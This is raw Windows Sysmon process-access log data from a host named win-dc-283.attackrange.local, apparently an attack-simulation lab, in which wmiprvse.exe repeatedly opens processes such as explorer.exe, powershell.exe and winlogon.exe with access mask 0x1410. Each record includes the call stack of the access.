15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024232Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024231Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024230Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024229Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024228Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024227Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024226Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024225Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024224Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024223Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024222Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024221Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024220Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024219Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024218Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024217Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024216Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024215Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024214Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024213Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 